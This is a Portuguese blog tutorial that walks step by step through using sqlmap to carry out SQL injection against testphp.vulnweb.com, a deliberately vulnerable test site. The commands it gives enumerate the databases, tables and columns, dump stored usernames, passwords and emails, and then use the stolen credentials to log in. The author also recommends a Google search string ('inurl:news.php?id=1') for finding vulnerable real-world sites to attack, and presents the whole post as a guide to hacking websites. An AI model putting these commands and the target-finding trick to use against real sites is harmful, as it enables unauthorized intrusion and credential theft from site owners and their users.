sábado, 7 de janeiro de 2017

Ango Hackianos - Como usar o sqlmap

Tags

Olá pessoal neste artigo eu vou ensinar a usar o sqlmap para poder hackear sites vulneráveis.
antes de iniciares com o tutorial deverás baixar o sqlmap + python.
Se já tens o seu sqlmap e python instalados em seu computador vamos então colocar a mão na massa.
Primeiro deverás abrir o seu CMD: clique no menu iniciar do windows digite CMD e de enter para abrir.
Abrirá uma janela preta.
No CMD digite o seguinte:

 cd  /d  D:\Softwares\sqlmapproject-sqlmap-f794d9d

tal com forme a imagem a baixo



D:\Softwares\sqlmapproject-sqlmap-f794d9d --> é a localização do sqlmap no seu computador

o site que será usado será o http://testphp.vulnweb.com/ um site disponibilizado pela acunetix, site vulnerável para estudos de falhas de segurança web.

voltando no CMD vamos digitar:
sqlmap.py -u  http://testphp.vulnweb.com/artists.php?artist=2 --current-db

OBS: o site têm que terminar com uma variavel como por exemplo a variavel artist=2  do site http://testphp.vulnweb.com/artists.php?artist=2 se você colocar simplesmente assim  http://testphp.vulnweb.com/ podes ficar relaxado que não vai funcionar.
para poderes localizar de forma rápida sites vulneráveis na internet basta ir na google e pesquisar por inurl:news.php?id=1 certamente que aparecerá uma lista de resultados de sites que estão vulneráveis.

depois de você executar esta linha de código
  sqlmap.py -u  http://testphp.vulnweb.com/artists.php?artist=2 --current-db no CMD, ele certamente fará três perguntas simplesmente tecle Enter para continuar, e aparecerá os nomes das base de dados do nosso site alvo.
tal como forme mostra a imagem a baixo.

como vêm apareceu dois nomes de base de dados o 1º é acuart e outro é information_schema.
information_schema é padrão não é tão importante para nós.
o mais importante é acuart.
agora que já descobrimos os nomes de base de dados vamos enumerar as tabelas da base de dados acuart:


sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart --tables
agora já descobrimos os nomes de tabelas da base de dados acuart

nós achamos uma tabela com o nome de users talvez aí possa ter algo que nos interessa o login e senha de algum usuário.
Agora vamos executar as colunas com a linha de código seguinte:
sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=2 -T users --columns


agora vamos fazer a coisa mais importante que é extrair os dados da base de dados acuart, usando a linha de código:
sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=2 --dbs -D acuart -T users -C uname,pass,name,email --dump


pelos vistos nós conseguimos hackear a base de dados e conseguir o
nome = kugjb
palavra-passe = test
email = kjsqdhewv

e agora vamos tirar proveito das informação extraidas vamos ao site:
http://testphp.vulnweb.com/login.php
e faremos o login



e despois de logado no site nós iremos parar na página de informações do usuario.

Bom pessoal se você conseguio obter os mesmos resultados parabéns caso não tente de novo verifique onde falhou, e obrigado por visitares este blog porfavor viste sempre o blog, divulga melhor o blog para poder ajudar o blog a se desenvolver, peça tutoriais que eu estarei pronto a responder obrigado.


EmoticonEmoticon